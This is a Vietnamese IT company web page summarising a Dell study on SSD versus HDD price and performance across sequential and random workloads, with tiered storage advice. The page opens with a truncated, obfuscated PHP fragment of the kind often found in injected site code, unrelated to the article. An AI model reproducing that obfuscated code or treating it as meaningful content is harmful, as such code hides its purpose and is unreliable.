=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) so-sanh-o-cung-ssd-va-hdd-gia-va-hieu-suat | danh-gia-so-sanh
Công cụ
Đăng nhập

Công ty cổ phần Thương mại và Dịch vụ Kỹ thuật ITC

Bạn đang ở: Home » Sản phẩm » Đánh giá, so sánh » So sánh ổ cứng SSD và HDD: Giá và Hiệu suất
Thứ bảy, 23 Tháng 5 2015

Giới thiệu sản phẩm

  • 1
  • 2
  • 3
Prev Next

5 laptop đầu tiên dùng chip Haswell về V…

5 laptop đầu tiên dùng chip Haswell về Việt Nam

Thế hệ chip mới xuất hiện cả từ phân khúc phổ thông như Dell Inspiron 5537 cho đến các model cao cấp như Toshiba Satellite P50 hay Acer Aspire S7 bản mới.Đúng như dự đoán, tháng 7 là thời điểm thị trường laptop hồi sinh với hàng loạt mẫu máy tính mới ra mắt. Sau hơn 3 tháng chỉ duy trì bằng các sản phẩm ở phân khúc giá rẻ...

Chi tiết

Máy tính để bàn kiêm tablet chạy Android…

Máy tính để bàn kiêm tablet chạy Android giá 7,5 triệu đồng

HP Slate 21 AIO sở hữu màn hình cảm ứng lớn chạy Android giúp thay thế máy tính để bàn truyền thống nền tảng Windows với mức giá rẻ hơn. Thiết bị được HP giới thiệu hôm qua đã chính thức có giá bán tại thị trường Mỹ là 359 USD, tương đương khoảng 7,5 triệu đồng. Sở hữu kiểu dáng đẹp, màn hình lớn nhưng Slate 21 AIO có giá...

Chi tiết

Những laptop nổi bật bán tháng 6/2013

Những laptop nổi bật bán tháng 6/2013

Thị trường đón nhận các model ở mức giá dưới 13 triệu đồng nhưng kiểu dáng mỏng nhẹ và khung kim loại chắc chắn như Asus K46CA hay Dell Vostro V5460. Không có mẫu máy "khủng" nào sẽ bán trong tháng 6 nhưng các model ở phân khúc bình dân vẫn hết sức hấp dẫn. Đây là thời điểm chip Intel Haswell đã ra mắt và chuẩn bị có mặt trên...

Chi tiết

So sánh ổ cứng SSD và HDD: Giá và Hiệu suất

Email In PDF.

Ổ cứng thể rắn (SSD) có hiệu suất hoạt động vượt trội so với ổ cứng thông thường (HDD) tuy nhiên có dung lượng nhỏ hơn và đắt hơn. Thêm vào đó, mỗi ứng dụng trong môi trường doanh nghiệp lại có các yêu cầu về dung lượng và hiệu suất hoạt động khác nhau. Do vậy, bộ phận IT của mỗi doanh nghiệp cần phải tìm hiểu đầy đủ các khía cạnh về giá, hiệu suất... của hai loại SSD và HDD để tìm ra loại thiết bị có giá thành hợp lý nhất cho mỗi loại ứng dụng.

Bài viết này được lược dịch từ tài liệu Solid State Drive vs. Hard Disk Drive Price and Performance Study của Dell. Tài liệu gốc được đính kèm trong bài viết này.

Mục đích của bài viết này nhằm cung cấp các lời khuyên về kiểu ổ đĩa nào sẽ phù hợp nhất cho những loại ứng dụng nào và cung cấp thông tin tổng quát về hệ thống lưu trữ SSD/HDD phân tầng, giúp cho bộ phận IT lựa chọn được hệ thống lưu trữ giá thành rẻ nhất tận dụng được các ưu thế nổi bật của cả 2 loại ổ đĩa này.

Giới thiệu chung

Thiết bị chủ yếu sử dụng trong ngành công nghệ lưu trữ là ổ cứng (HDD). Tuy nhiên, trong khi dung lượng của HDD tăng 40% hàng năm thì hiệu suất truy xuất vào/ra ngẫu nhiên (ramdom I/O access) chỉ tăng 2% hàng năm. Điều này có nghĩa là đối với các ứng dụng trong môi trường doanh nghiệp, ảo hóa, đám mây, web có yêu cầu cao cả về hiệu suất hoạt động và dung lượng lưu trữ, HDD có thể không phải là một giải pháp có giá thành hợp lý, kể cả khi giá thành cho mỗi Gb lưu trữ gần đây đã giảm đáng kể. Gần đây, một công nghệ ổ đĩa lưu trữ mới là SSD bắt đầu cho nhiều hứa hẹn. SSD cung cấp hiệu suất vượt trội nhưng dung lượng lưu trữ trên mỗi ổ đĩa lại thấp hơn nhiều so với HDD. Ổ đĩa SSD cũng đắt hơn nhiều so với HDD và tuổi thọ bị giới hạn bởi số lần ghi.

Một thách thức mới nảy sinh là làm thế nào xác định được mức giá hợp lý nhất những vẫn phải đảm bảo các yêu cầu về dung lượng và hiệu suất đối với các ứng dụng doanh nghiệp. Để giải quyết thách thức này và tìm ra cách kết hợp HDD và SSD vào trong một hệ thống lưu trữ, bộ phận IT trước hết phải định lượng được các yếu tố như hiệu suất, dung lượng và giá của HDD và SSD đối với các ứng dụng khác nhau.

Bài viết này cung cấp các kết quả kiểm tra hiệu suất hoạt động độc lập của HDD và SSD tại Dell Labs với nhiều loại ứng dụng được giả lập khác nhau. Mục tiêu là cung cấp cho bộ phận IT những thông tin cần thiết nhất để khai thác được các ưu thế về giá, hiệu suất và dung lượng của hai loại ổ SSD và HDD.

Ghi chú: trong quá trình thử nghiệm đã không tính đến yếu tố tuổi thọ (số lần ghi hữu hạn) làm ảnh hưởng đến giá thành của ổ SSD cũng như giả thiết tỷ lệ thời gian dành cho việc ghi dữ liệu vào ổ SSD trong một chu kỳ sử dụng 24h là 10%.

Tóm tắt về công nghệ HDD và SSD

Ổ HDD sử dụng các đĩa quay và các hoạt động cơ học có thể gây ra sự chậm trễ khi truy xuất dữ liệu. Ổ SSD, được làm từ các chip nhớ, không chứa các thành phần chuyển động, có thời gian tìm kiếm gần như bằng không giúp giảm rất đáng kể thời gian đáp ứng. SSD đặc biệt có ý nghĩa đối với các ứng dụng cần hiệu suất cao được đo bằng độ trễ truy xuất và số tác vụ vào/ ra trong một giây (IOPS) và không yêu cầu nhiều dung lượng.

Đo lường hiệu suất hoạt động của HDD và SSD

Chúng tôi thiết lập 11 mô hình hoạt động I/O (bảng 1). Đối với mỗi mô hình, chúng tôi dùng ứng dụng IOmeter để giả lập sự hoạt động và đo lường chỉ số I/O. Việc phân tích được thực hiện bằng phiên bản IOmeter 2006 (có nhiều dữ liệu ngẫu nhiên hơn phiên bản 2008). Thông tin về phần mềm này xem tại http://www.IOmeter.org.

Bảng 1. Application I/O Workload Profiles

Mỗi một mô hình được vận hành trên một server kết nối tới các ổ đĩa đích được thử nghiệm ở chế độ độc lập (standalone mode) thông qua một adapter RAID H200 loại lắp trong (nhưng không cấu hình RAID). Các ổ đĩa đích là loại 10K RPM SAS HDD, Enterprise Value SSD, và Enterprise Mainstream Performance SSD. Bảng 2 chỉ ra sự khác nhau giữa hai loại ổ SSD này (Enterprise Value và Enterprise Mainstream Performance).

Bảng 2. Sự khác nhau giữa 2 loại ổ Enterprise Mainstream Performance SSD và Enterprise Value SSD

Kết quả kiểm tra: So sánh giữa giá và hiệu suất

Trong phần này, chúng ta giới thiệu 2 mẫu kết quả thử nghiệm – một cho hoạt động truy xuất tuần tự và một cho truy xuất ngẫu nhiên – sẽ làm nổi bật sự khác biệt về giá và hiệu suất giữa 2 loại ổ HDD và SSD. So sánh giá (USD/GB) giữa 3 loại ổ này được trình bày ở hình 1.

Hình 1. So sánh mức giá/GB của các loại ổ: Enterprise Mainstream Performance SSD, Enterprise Value SSD, và 10K SAS HDD

Hoạt động truy xuất tuần tự - Media Streaming

Media Streaming là một ví dụ của của hoạt động truy xuất tuần tự. Server Media streaming là các hệ thống cung cấp web-casting, video conferencing, giải trí Internet (Internet TV, radio) và các dịch vụ multimedia. Các hệ thống này nhìn chung yêu cầu sự cân bằng giữa dung lượng lưu trữ, tính sẵn sàng, khả năng chịu lỗi và hiệu suất. Bảng 3 tóm lược các tham số I/O sử dụng trong trường hợp thử nghiệm media-streaming

Bảng 3. Media Streaming Server I/O Workload Profile

Hình 2. Hiệu suất hoạt động của Media Streaming Server

Bảng 4. So sánh hệ số Giá/MBPS và Hiệu suất giữa HDD và SSD

Từ hình 2 và bảng 4, chúng ta có thể thấy rằng đối với các hoạt động truy cập tuần tự, ví dụ như các ứng dụng media streaming thì hệ số Giá/MBPS sẽ trở nên lớn hơn hệ số hiệu suất tương ứng khi chuyển từ HDD sang SSD. Nói cách khác, bộ phận IT sẽ phải trả một khoản nhiều hơn đáng kể cho ổ SSD (gấp 13 lần nếu chuyển sang loại Enterprise Mainstream Performance SSD) so với mức độ cải thiện hiệu suất mà họ nhận được (1.5 lần nếu chuyển sang loại Enterprise Mainstream Performance SSD). Do vậy, đối với các ứng dụng truy xuất tuần tự, sử dụng ổ cứng truyền thống đem lại hiệu quả về giá hơn.

Nếu muốn hiệu suất cao hơn, thì Enterprise Value SSD là một lựa chọn tốt (xem bảng 4). Enterprise Value SSD có giá thấp hơn nhiều so với loại Enterprise Mainstream Performance SSD (xem hình 1) nhưng cung cấp hiệu suất tương tự thậm chí tốt hơn ở các hàng đợi dài.

Bộ phận IT muốn sử dụng SSD sẽ phải cân nhắc cả 2 chỉ số hiệu suất cũng như giá/hiệu suất trước khi quyết định. Đối với một vài hoạt động IT, tăng thêm chi phí chưa chắc đã cải thiện được hiệu suất một cách tương ứng.

Hoạt động truy xuất ngẫu nhiên - Microsoft Exchange Email

Yêu cầu lưu trữ đối với email server có thể rất khác nhau vì phụ thuộc vào dung lượng hộp thư và số lượng địa chỉ email cũng như kiểu và số lượng người dùng. Trong khi email server của các chi nhánh nhỏ có thể chỉ cần dung lượng lưu trữ và tính năng giới hạn, email server của công ty lớn thông thường yêu cầu dung lượng lưu trữ lớn hơn nhiều cũng như yêu cầu về mức độ sẵn sàng, hiệu suất và khả năng nâng cấp cao hơn. Mô hình I/O do vậy sẽ khác nhau tùy thuộc vào số lượng người dùng, kích thước hộp thư và file đính kèm. Bảng 5 tóm lược các tham số I/O sử dụng trong trường hợp thử nghiệm Microsoft Exchange Email.

Bảng 5. I/O Workload Profile for Exchange Email

Hình 3. Hiệu suất hoạt động của Exchange Email Server

Bảng 6. So sánh hệ số Giá/IOPS và Hiệu suất giữa ổ HDD và SSD

Ổ SSD thích hợp nhất cho các ứng dụng sử dụng cách truy cập dữ liệu ngẫu nhiên và kích thước nhỏ. Từ hình 3 và bảng 6, bạn có thể thấy tại hàng đợi sâu ở mức 8, Enterprise Mainstream Performance SSD cho hiệu suất nhanh hơn 60 lần so với HDD truyền thống, và hệ số Giá/IOPS chỉ bằng 1/3 so với HDD. Nói cách khác, bộ phận IT sẽ nhận được hiệu suất tăng đáng kể cũng như chỉ số giá tốt nếu chuyển từ HDD sang SSD. Phải nói thêm rằng chỉ số này càng được cải thiện nếu chiều sâu hàng đợi tăng thêm.

Do vậy, đối với các ứng dụng truy xuất hoàn toàn ngẫu nhiên như Exchange Mail, ổ SSD cung cấp sự cải thiện to lớn về hiệu suất cũng như lợi ích về giá rõ ràng.

Kết luận

Khách hàng nên cân nhắc đánh giá cả hai loại chỉ số hiệu suất và giá/hiệu suất khi quyết định mua ổ SSD hay HDD. Ổ SSD cung cấp lợi ích đáng kể đối với một số loại hoạt động cụ thể. Tuy nhiên, nếu hoạt động của bạn không yêu cầu hiệu suất cao, hoặc có chu kỳ ghi nhiều hơn 10% và không thể áp dụng lưu trữ phân tầng (xem giải thích phần dưới), đầu tư vào ổ SSD là không hiệu quả về chi phí. Mặc dù hệ thống của bạn vận hành tốt, nó có vẻ như được dự phòng nhiều hơn mức cần thiết trong khi được khai thác dưới mức mà ứng dụng có thể tận dụng.

Hoạt động truy xuất tuần tự

Đối với các hoạt động truy xuất tuần tự điển hình, HDD truyền thống cung cấp một kết hợp giữa dung lượng và hiệu suất tại một mức giá rất tốt. Cho dù ổ SSD có thể cung cấp hiệu suất tốt hơn so với HDD kể cả đối với các ứng dụng truy xuất tuần tự, sự cải thiện về hiệu suất không cân đối với cái giá phải trả. Do vậy, chúng tôi khuyên dùng HDD cho các ứng dụng thiên về truy xuất tuần tự.

Hoạt động truy xuất ngẫu nhiên

Đối với các hoạt động truy xuất ngẫu nhiên, ổ SSD cung cấp sự cải thiện về hiệu suất một cách to lớn. Hiệu suất còn được cải thiện hơn nếu như các ứng dụng xử lý song song nhiều hơn và do vậy tận dụng tối đa khả năng của SSD. Các cải thiện về hiệu suất thu được đối với các hoạt động truy xuất ngẫu nhiên rõ ràng có lợi hơn so với chi phí phải bỏ ra thêm. Do vậy, chúng tôi khuyên sử dụng ổ SSD đối với các ứng dụng truy xuất I/O ngẫu nhiên, đặc biệt với phần mềm phân tầng hoặc một môi trường có chu kỳ ghi thấp. Bảng 7 tóm tắt các khuyến cáo của Dell.

Chú ý: Dell tin rằng cách tốt nhất để tận dụng công nghệ SSD là sử dụng hệ thống lưu trữ nhiều tầng, nó gồm một hệ thống tích hợp trộn lẫn gồm cả HDD và SSD đem lại hiệu suất tốt nhất với mức giá cả thấp nhất.

Bảng 7. Khuyến nghị sử dụng ổ đĩa đối với các mô hình ứng dụng hoạt động I/O

Chú ý: trong phân tích này, chúng tôi giả thiết khả năng ghi có giới hạn của ổ SSD không ảnh hưởng đến chi phí của chủ sở hữu. Nó cũng giả thiết rằng các chu kỳ ghi (lượng thời gian dùng để thực hiện tác vụ ghi trong chu kỳ 24h) là khoảng 10%.

Kết hợp chúng với nhau – Triển khai phân tầng tự động và thủ công

Mô hình hoạt động lưu trữ phân tầngPhương pháp lưu trữ phân tầng rất hiệu quả do nó đáp ứng nhu cầu doanh nghiệp về phương tiện lưu trữ phù hợp với mức giá hợp lý. Bằng việc phân tầng, các bộ phận IT doanh nghiệp có thể điều hướng các hoạt động I/O mức độ cao ví dụ như OLTP hoặc một số ứng dụng web cụ thể tương tác trực tiếp với người dùng tới các ổ SSD hoặc mảng ổ đĩa SCSI (SAS) có hiệu suất cao. Tương tự như vậy, các file hoặc dữ liệu của ứng dụng chậm có thể được điều hướng tới mảng ổ đĩa Nearline SAS/SATA SAN có giá thành rẻ hơn.

Nguồn: Dell

Tải về
Download this file (ssd_vs_hdd_price_and_performance_study.pdf)ssd_vs_hdd_price_and_performance_study.pdf[Solid State Drive vs. Hard Disk Drive Price and Performance Study (Dell)]186 Kb
So sánh ổ cứng SSD và HDD: Giá và Hiệu suất 5.0 out of 5 based on 2 votes.

Thêm bình luận


Mã bảo vệ Làm mới hình ảnh